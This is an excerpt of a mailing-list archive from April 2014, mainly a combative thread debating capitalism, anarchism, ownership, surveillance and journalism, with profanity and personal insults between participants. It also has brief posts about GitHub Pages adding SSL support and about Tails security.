have multiple meanings and we use them withing > 'contexts'. Using the word 'believe' in the context I did doesn't have > religious connotations at all. But I bet you know that. It looks like > you are upset and just lashing out at everything because we don't > agree. That's alright. I've seen your posts here and know you're more > intelligent than that. So, yes, you're a 'believer' or...at > least...you should be. > > > they point to our current system and say 'see, it's exploitive and > > hurts people!' and it does. But that's not a true capitalist > > system. Will we ever actually have one? Doubtful. But what we have > > now is definitely not a good example. > > > > > >> i dont think you understand that capitalism is well beyond an > >> economy - watch naomi klein > > Oh I understand it very well. I suspect it's you, who's obviously > stuck within a very narrow worldview, who may not understand it. I've > read Ms. Klein and I like a lot of her work - I don't agree with all > of it, but I like it. But you know as well as I do that she comes at > the topic with a bias. Also, from what I've read, her main beef seems > to be with globalization and the influence corporations have on > governments and, thus, the people. Remember, we've already covered > this: it's not capitalism but /fascism/ when you have that. > > Do you have any thing in particular by Ms. Klein you'd like me to read > that may help 'educate' me? I'd be happy to give it a go. So far, I've > only read "No Logo", "The Take", and "The Shock Doctrine". Anything > else I should pick up? > > >> https://www.youtube.com/watch?v=Ka3Pb_StJn4 > > Yep, saw this video series. Brilliant woman, great book. Still talking > largely about fascism and not capitalism. I mean, sure, she uses the > /word/ 'capitalism' but that's not what she's describing. She's > talking fascism. > > >> with capitalism the iraq invasion happened within its frame > > > >> black sites torture sites around the globe where conducted within > >> the frame of capitalism > gitmo 'lives' inside the frame of > >> capitalism > > So, do you believe that the horrible things that happened in Iraq and > GITMO wouldn't have happened if the corporations weren't involved? I > agree that they probably wouldn't have happened on such a /massive/ > scale simply because their would have been a manpower shortage but I > suspect some of those 'true blue' soldiers wouldn't have had much of a > problem picking up a chemical light and sticking it up someone's > ass...or raping them. Were the naked pictures of prisoners at Abu > Ghraib capitalism at work too? Oh, wait, those were soldiers, not > businessment trying to make money. > > >> i dont think you understand anarchy or anarchistic thought > >> processies at all > > I certainly admit that I don't understand it as much as /you/ do or > many others who spend a good amount of their time researching and > reading anarchistic thought. But I do have a good understanding of it. > However, feel free to point me in the direction of some good > educational material. I'll read it happily! I like exploring different > thoughts. I actually /like/ the idea of anarchy, just like I like much > of the ideas of socialism. But they both, IMHO, fall a bit off the > mark. That might be an educational thing that can be fixed though so > feel free to point me in the right direction. No sarcasm intended > here, I am open to learning! > > Cypher > > > -----BEGIN PGP SIGNATURE----- > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ > > iQIcBAEBCgAGBQJTPdEAAAoJEFuutbL6JoJrTmkP/2sH2LYqKN620/tkbZOT0fjD > /JBsbumLknFOUL7ZpYcfa+Nh+2SOLTOFDX7GxuUckbHnkUtjAZgrXKcB+aoMYbMp > NOZrufIp4lcOZo7a/5DWRlU4gYRH0FtYxkpDP06lLxWDHFQ0vCujflrifGiMidPU > Ln4ATUy/wcT+OBDk+l3bWvoH3N9M2HQ9Ib/VaIcoyK6QOKLCKlMuKu+ft2PPK1nz > n9NPFyEFFkLzs7uJZh+s0UYPHAJSJbB0pd/IBQ3NA3U8DfJBbQmH9SWOmNTFTBdo > z8CFCem4smbUvyn208HQ1dyDArY400GnOx2Y20bADB+YO0g62CSmKEshPhPSRmDG > bI4LnyUICrJ0rRKU/FzQLCTEtWNeRGAY8JhbMgQVShpqfcWl4TTL745b+FEk04QO > Ikpnb2k+1zuGa+lDi4Xp9Lv0fxSW3W0j+w+t9o+u+0K/fOWkF7Gx/uB9G0/oynOb > /sFMsvaUOcx7a879bHa88rr4mH5L5puCjTOeAUBkyC39jxcTRFvLEw4Sai1Q9mEY > ZODFhA1BSgVJungKYLpqevIIyVlsKJW9LK8+ov8i2WDF2ygq1EqI+3iOwoKxFfmC > EO9XdHUYtGtPsQKqh5ldl7rGQWYxu3J+FatmVhwGKCEdVer+yP/f5gT1h4SjrHVp > x67TKKhVf3r2CYcZyZmw > =gX6E > -----END PGP SIGNATURE----- > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 16962 bytes Desc: not available URL: From pc at loom.cc Fri Apr 4 07:19:19 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 10:19:19 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> Message-ID: <533EBF67.6020708@loom.cc> Cari Machet wrote, On 04/04/2014 05:11 AM: > On Thu, Apr 3, 2014 at 8:59 PM, Patrick Chkoreff > wrote: > > Cari Machet wrote, On 04/03/2014 03:48 PM: > > > nobody 'owns' anything > > Ownership is an exclusive right of use or disposal. If I wake up one > morning and find you in my house eating my food, you-gonna be in big > trouble Lucy. > its a lie you tell yourself - you were told its true its not > > ever heard of eminent domain ? > > ever heard of israel? > > lets not even talk about your paycheck Now THAT is a good point. I thought you were deriding the very concept of ownership. If you're saying that private property is such a good idea that maybe we should *try* it sometime, then I'm with you. -- Patrick From pc at loom.cc Fri Apr 4 07:24:54 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 10:24:54 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533DD10D.8090005@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> Message-ID: <533EC0B6.6030500@loom.cc> Cypher wrote, On 04/03/2014 05:22 PM: > But, please, instead of ranting and wild arm-waving, educate me if > I am wrong. I would certainly /love/ to see a workable, large > scale, anarchistic plan. Please, no large scale plans, I beg you. I simply wish to see the emergent effects of countless individuals interacting with each other solely on the basis of mutual consent. That is all. -- Patrick From guido at witmond.nl Fri Apr 4 01:49:31 2014 From: guido at witmond.nl (Guido Witmond) Date: Fri, 04 Apr 2014 10:49:31 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140404042502.7DA6C2280B0@palinka.tinho.net> References: <20140404042502.7DA6C2280B0@palinka.tinho.net> Message-ID: <533E721B.5080708@witmond.nl> On 04/04/14 06:25, dan at geer.org wrote: > I fear we are on the edge of a rat-hole here. I forwarded Geoff's > remarks as they are relevant, timely, and speak to the absence of > simplistic nostrums in such matters, both because of the rising > popular / political demand for comfort-and-safety and because the > technologies that those charged with delivering comfort and safety > use are COTS technologies. And dual use. Personally, I think of > surveillance as just another tax, which you may safely assume is > said through clenched libertarian cum Tea Party teeth. Hi Dan, I like your idea of comparing being spied upon to paying tax. The similarities are striking: Like tax, I prefer to pay the least amount. Like tax, I can hire a professional that knows tax law inside out to find the (legal) loopholes. Like tax, it should be discussed in public. Like tax, society should strive to minimize the tax-burden. Like tax, we don't tax those to whom it doesn't apply. Regards, Guido. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 897 bytes Desc: OpenPGP digital signature URL: From carimachet at gmail.com Fri Apr 4 04:03:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 11:03:42 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <9857014.dptqhKsx4l@lap> References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> Message-ID: fuck off rysiek its a really long thing to explain to someone the future of fucking journalism if they are that far back i mean i could just say look at medium or look at certain journo's i guess like asher wolfe - money is not the object this person is a capitalist thinker and they dont understand the ethics of journo within the structure of how a journo works - nor do i think they care to really understand the point i was making i was making an argument not just calling them bad names my argument is they dont know enough - prove me wrong rysiek..... fucker hehe On Fri, Apr 4, 2014 at 10:44 AM, rysiek wrote: > Dnia piątek, 4 kwietnia 2014 09:15:57 Cari Machet pisze: > > when people have no argument they resort to name calling and character > > assassination (...) > > ...and then... > > > you dont know anything about journalism past mayb the stone age > > http://i0.kym-cdn.com/photos/images/original/000/612/974/1de.php > > -- > Pozdr > rysiek -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2391 bytes Desc: not available URL: From yan at mit.edu Fri Apr 4 11:40:20 2014 From: yan at mit.edu (yan) Date: Fri, 04 Apr 2014 11:40:20 -0700 Subject: Github Pages now supports SSL In-Reply-To: References: Message-ID: <533EFC94.4060708@mit.edu> There's even an HTTPS Everywhere rule for it already in case you *only* want to ever access it over SSL! https://www.eff.org/https-everywhere (only in the development branch right now, should be released soon) On 04/04/2014 11:08 AM, Eric Mill wrote: > I know most of the people on here have transcended the earthbound, > maudlin Certificate Authority system, but as services-adopting-SSL-news > goes, I'm particular excited about Github Pages > , which started > quietly supporting SSL for *.github.io domains a few > weeks back. > > I'm excited because Github Pages is powerful, verrrrry flexible, and > totally free. AFAIK, it's the only major blog/web host that gives you > free SSL, backed by a high quality CDN (since everything is static files). > > To promote the occasion and nudge Github to take it further, I wrote up > my own experience, and a little how-to for forcing redirects via Jekyll: > > https://konklone.com/post/github-pages-now-supports-https-so-use-it > > Along with Cloudflare's 2014 plan to offer SSL termination for free, and > their stated plan to double SSL on the Internet by end of year, the > barrier to HTTPS everywhere is dropping rapidly. > > -- Eric > > -- > konklone.com | @konklone > From rysiek at hackerspace.pl Fri Apr 4 03:44:07 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 04 Apr 2014 12:44:07 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> Message-ID: <9857014.dptqhKsx4l@lap> Dnia piątek, 4 kwietnia 2014 09:15:57 Cari Machet pisze: > when people have no argument they resort to name calling and character > assassination (...) ...and then... > you dont know anything about journalism past mayb the stone age http://i0.kym-cdn.com/photos/images/original/000/612/974/1de.php -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From pc at loom.cc Fri Apr 4 10:56:18 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 13:56:18 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> <533EBF67.6020708@loom.cc> Message-ID: <533EF242.5010604@loom.cc> Cari wrote: > i dont agree that there is scarcity ... i think we have abundance and > the very idea of scarcity is a con game the elite and the autocrats > feed everyone fr before they are born so that they can exploit them You may not believe in scarcity, but I know one thing for a fact. I have a limited amount of food in my refrigerator, and a limited tolerance for strangers in my house. You may not call that "scarcity" but it sure sounds like scarcity to me. So I'll say it again: if I wake up one morning and find you in my house eating my food, you-gonna be in big trouble Lucy. -- Patrick From eric at konklone.com Fri Apr 4 11:08:46 2014 From: eric at konklone.com (Eric Mill) Date: Fri, 4 Apr 2014 14:08:46 -0400 Subject: Github Pages now supports SSL Message-ID: I know most of the people on here have transcended the earthbound, maudlin Certificate Authority system, but as services-adopting-SSL-news goes, I'm particular excited about Github Pages, which started quietly supporting SSL for *.github.io domains a few weeks back. I'm excited because Github Pages is powerful, verrrrry flexible, and totally free. AFAIK, it's the only major blog/web host that gives you free SSL, backed by a high quality CDN (since everything is static files). To promote the occasion and nudge Github to take it further, I wrote up my own experience, and a little how-to for forcing redirects via Jekyll: https://konklone.com/post/github-pages-now-supports-https-so-use-it Along with Cloudflare's 2014 plan to offer SSL termination for free, and their stated plan to double SSL on the Internet by end of year, the barrier to HTTPS everywhere is dropping rapidly. -- Eric -- konklone.com | @konklone -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1466 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 08:20:19 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:20:19 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533EBF67.6020708@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> <533EBF67.6020708@loom.cc> Message-ID: On Fri, Apr 4, 2014 at 2:19 PM, Patrick Chkoreff wrote: > Cari Machet wrote, On 04/04/2014 05:11 AM: > > > On Thu, Apr 3, 2014 at 8:59 PM, Patrick Chkoreff > > wrote: > > > > Cari Machet wrote, On 04/03/2014 03:48 PM: > > > > > nobody 'owns' anything > > > > Ownership is an exclusive right of use or disposal. If I wake up one > > morning and find you in my house eating my food, you-gonna be in big > > trouble Lucy. > > > > its a lie you tell yourself - you were told its true its not > > > > ever heard of eminent domain ? > > > > ever heard of israel? > > > > lets not even talk about your paycheck > > > Now THAT is a good point. I thought you were deriding the very concept > of ownership. If you're saying that private property is such a good > idea that maybe we should *try* it sometime, then I'm with you. > > o your funny there is actually a lot in common that libertarians and anarchists have but it is bent differently - i dont agree that there is scarcity and live in intense fear that i wont get lotsa stuff - i think we have abundance and the very idea of scarcity is a con game the elite and the autocrats feed everyone fr before they are born so that they can exploit them i find the houses that look like restaurants or hotels that i have seen in the suburbs that outline washington dc are repulsive and i find it repulsive that there are people that have no potable water on the planet and cannot read or write - i would rather people and everything were treated and thought of as more equal > > -- Patrick > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3289 bytes Desc: not available URL: From cypher at cpunk.us Fri Apr 4 13:25:03 2014 From: cypher at cpunk.us (Cypher) Date: Fri, 04 Apr 2014 15:25:03 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533EC0B6.6030500@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> Message-ID: <533F151F.6020801@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: > Cypher wrote, On 04/03/2014 05:22 PM: > >> But, please, instead of ranting and wild arm-waving, educate me >> if I am wrong. I would certainly /love/ to see a workable, large >> scale, anarchistic plan. > > Please, no large scale plans, I beg you. I simply wish to see the > emergent effects of countless individuals interacting with each > other solely on the basis of mutual consent. That is all. Good response, Patrick. But how do you think we're going to get to that? Without concerted action, and it has to be more than everybody doing their own thing IMHO, how will that goal be achieved? I hear a lot of anarchists saying what you say and it's a fantastic goal. But how do we get there? - -- Want to communicate with me privately? Find my PGP public key here: http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCgAGBQJTPxUfAAoJEFuutbL6JoJrRLoP/RiWKL2JaXTJiYwhWvjw6xM9 mzkm8SbQInZCEvqJ4FW82Zg//tOkrK9a/kvvRQCb2Y5MdxB5Ezkrt5qm2GwLzUJX xNl1+nl68J6BJzxjpqVmrf5zZfllLffLcU0084ajqGXY/rilzmCENB8F/epxmiR6 +cVdM9NXl953chNB9zz48ZpNKCe/mrz0CWPKUW4BEWzajp6r5iIcves3f78egLow nVWA+OQnQ0FBf78kMpn8MRnYf3EUA4KHXxzAo1DHbyWKGuykAcrzEnjCHE/7zOxi 21rhcUI7TT0S4G1hLmPDWIY3LgFFnV/CgRmsP3a1hF74i3vmccjYiRCDDINMxbet Rw3YRS94NhyfK3BJneAfOiGM55nnbki8MVlh42V/WWDYdBhWOqMvV3akTbnCkbaX 7fGy3ItnzyqUUjQa76Ywh+V0CZDlsMC/tnbFkAw44US7RGKCnzSe5OK47uXzsSwT 6KVEyEYPu8wHmrkB7u2zymKE5Ce/paizxDyMFEhbdwu0N47LbN728j7xgw8Zhbvj mIMnzHdRd8ZaGb9ccU8j1iGUUF1YMHCrrMB0ybtrzQHvyFSRT5ATeHpafX23w3bB xrgpbiO/ZL/52zwWzF2dbJMVzXdTbj3WRnMGMWKxKOmYQs9YJ7U8yLCCL/ETnAcL lToSMaLELVfi7QiyuIe8 =8+H4 -----END PGP SIGNATURE----- From carimachet at gmail.com Fri Apr 4 08:28:38 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:28:38 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> Message-ID: On Fri, Apr 4, 2014 at 2:01 PM, wrote: > > Message du 04/04/14 13:36 > > De : "Cari Machet" > > fuck off rysiek its a really long thing to explain to someone the future > of > > fucking journalism > > Before the "future of journalism" there is the present and you are failing > hard at it. If your future of journalism implies your ignorant opinion, I > personally prefer another future, which can be shaped right now by keeping > your crazy mind away from anything important. > > > if they are that far back i mean i could just say look > > at medium or look at certain journo's i guess like asher wolfe - money is > > not the object this person is a capitalist thinker > > A bit of structured discourse or grammar studies would be a plus to your > chances of getting a job. > > > and they dont understand > > the ethics of journo within the structure of how a journo works > > Your "ethics" is merely your biased opinions, nothing more. Nobody needs > it, sorry. > > > - nor do i > > think they care to really understand the point i was making > > > > Crazy people are rather hard to understand. They make nonsensical phrases, > they throw childish fits, they invent ethics that only exist in their > minds, etc. > > > i was making an argument not just calling them bad names my argument is > > they dont know enough - prove me wrong rysiek..... fucker hehe > > > > Yes, you were just calling bad names and clearly your "know enough" equals > to "think crazy like me", which is a stupid argument not worth following. > Not everyone is bipolar and depressed in this world. > > You fail hard as an agent provocateur. > if i am such a goddamn incomprehensible nothing why do you bother to argue with me at all or why can you even comprehend enough of it to argue? ouroboros please do some research into new more democratic forms of journalism - journalistic co-ops etc -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3538 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 08:29:46 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:29:46 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533EC0B6.6030500@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> Message-ID: On Fri, Apr 4, 2014 at 2:24 PM, Patrick Chkoreff wrote: > Cypher wrote, On 04/03/2014 05:22 PM: > > > But, please, instead of ranting and wild arm-waving, educate me if > > I am wrong. I would certainly /love/ to see a workable, large > > scale, anarchistic plan. > > Please, no large scale plans, I beg you. I simply wish to see the > emergent effects of countless individuals interacting with each other > solely on the basis of mutual consent. That is all. > why? > > > -- Patrick > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1908 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 08:33:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:33:42 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140404135311.316F7228143@palinka.tinho.net> References: <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com> <20140404135311.316F7228143@palinka.tinho.net> Message-ID: On Fri, Apr 4, 2014 at 1:53 PM, wrote: > > shelley at misanthropia.info writes: > | On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote: > | > | >you can take my word, if you like > | > | No offense meant to you personally Dan, because I don't know you, but- I > | don't trust the word of anyone from In-Q-Tel in matters such as these. > | > > That is both perfectly fine and perfectly aligned with Geoff's remarks. > thats cute dan but no it is not aligned with what he said he did not say 'dont trust me' total bullshit > --dan > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1993 bytes Desc: not available URL: From tpb-crypto at laposte.net Fri Apr 4 07:01:42 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 04 Apr 2014 16:01:42 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> Message-ID: <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> > Message du 04/04/14 13:36 > De : "Cari Machet" > fuck off rysiek its a really long thing to explain to someone the future of > fucking journalism Before the "future of journalism" there is the present and you are failing hard at it. If your future of journalism implies your ignorant opinion, I personally prefer another future, which can be shaped right now by keeping your crazy mind away from anything important. > if they are that far back i mean i could just say look > at medium or look at certain journo's i guess like asher wolfe - money is > not the object this person is a capitalist thinker A bit of structured discourse or grammar studies would be a plus to your chances of getting a job. > and they dont understand > the ethics of journo within the structure of how a journo works Your "ethics" is merely your biased opinions, nothing more. Nobody needs it, sorry. > - nor do i > think they care to really understand the point i was making > Crazy people are rather hard to understand. They make nonsensical phrases, they throw childish fits, they invent ethics that only exist in their minds, etc. > i was making an argument not just calling them bad names my argument is > they dont know enough - prove me wrong rysiek..... fucker hehe > Yes, you were just calling bad names and clearly your "know enough" equals to "think crazy like me", which is a stupid argument not worth following. Not everyone is bipolar and depressed in this world. You fail hard as an agent provocateur. From tpb-crypto at laposte.net Fri Apr 4 08:43:44 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 04 Apr 2014 17:43:44 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> Message-ID: <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> > Message du 04/04/14 17:28 > De : "Cari Machet" > if i am such a goddamn incomprehensible nothing why do you bother to argue > with me at all or why can you even comprehend enough of it to argue? > You keep feeling our inboxes with your nonsensical rants. In a more modern version of an old proverb: your finger tips are faster than your brain. > ouroboros > Incubus. > please do some research into new more democratic forms of journalism - > journalistic co-ops etc > That's as old as pissing forwards. From carimachet at gmail.com Fri Apr 4 10:57:26 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 17:57:26 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> Message-ID: On Fri, Apr 4, 2014 at 3:43 PM, wrote: > > Message du 04/04/14 17:28 > > De : "Cari Machet" > > if i am such a goddamn incomprehensible nothing why do you bother to > argue > > with me at all or why can you even comprehend enough of it to argue? > > > > You keep feeling our inboxes with your nonsensical rants. In a more modern > version of an old proverb: your finger tips are faster than your brain. > > i would never feel an inbox and am wholly against 'feeling inboxes' not down at all for that ever meow kitty kitty (is my insenuation made clear?) > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1990 bytes Desc: not available URL: From pc at loom.cc Fri Apr 4 14:58:58 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 17:58:58 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533F151F.6020801@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> <533F151F.6020801@cpunk.us> Message-ID: <533F2B22.9040007@loom.cc> Cypher wrote, On 04/04/2014 04:25 PM: > On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: >> Cypher wrote, On 04/03/2014 05:22 PM: > >>> But, please, instead of ranting and wild arm-waving, educate me >>> if I am wrong. I would certainly /love/ to see a workable, >>> large scale, anarchistic plan. > >> Please, no large scale plans, I beg you. I simply wish to see >> the emergent effects of countless individuals interacting with >> each other solely on the basis of mutual consent. That is all. > > Good response, Patrick. But how do you think we're going to get to > that? Without concerted action, and it has to be more than > everybody doing their own thing IMHO, how will that goal be > achieved? I hear a lot of anarchists saying what you say and it's a > fantastic goal. But how do we get there? An old friend of mine summed up the basic physics of the situation: > Massive enslavement is the norm because it is possible to derive > sufficient revenue from it to pay the costs of maintaining it. As > long as that existential fact is true it does not matter what most > people think or want. You mentioned that "concerted action" would have to be more than everybody doing their own thing. Not necessarily, if "doing your own thing" means conducting one's affairs in such a way that minimizes the net benefit to those who would restrict your freedom, while still providing a net benefit to yourself. That goes to the heart of my friend's point. He goes on to say that notions like "mass action" or "mass enlightenment" are just more collectivist drivel, and he's rather emphatic about it: > The orthodoxy is that all you have to do is teach most people the > truth and they will throw off their chains, since the rulers > depend for their power on fooling people into giving their consent. > This is hogwash belied by all human history. It is only credible to > people indoctrinated in the democratic myths that have arisen in > the last 200 years reinforced by collectivist thinking. It's all about the physics, though discussing the specifics can be delicate. -- Patrick From rysiek at hackerspace.pl Fri Apr 4 09:09:05 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 04 Apr 2014 18:09:05 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <533EBF67.6020708@loom.cc> Message-ID: <1975070.3dRqEqeRNU@lap> Dnia piątek, 4 kwietnia 2014 15:20:19 Cari Machet pisze: > > Now THAT is a good point. I thought you were deriding the very concept > > of ownership. If you're saying that private property is such a good > > idea that maybe we should *try* it sometime, then I'm with you. > > o your funny Wait, whose funny? I thought it's their funny. It's definitely not my funny... -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From carimachet at gmail.com Fri Apr 4 11:09:25 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 18:09:25 +0000 Subject: [cryptography] Tails In-Reply-To: References: <533EAF1C.6090006@iang.org> Message-ID: On Fri, Apr 4, 2014 at 1:28 PM, John Young wrote: > Informative tweets on Tails security since the fund-raising announcement: > > http://cryptome.org/2014/04/tails-security.pdf > > thanks alexa is right need to make more tools then > dont care if it is hard to hack -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: 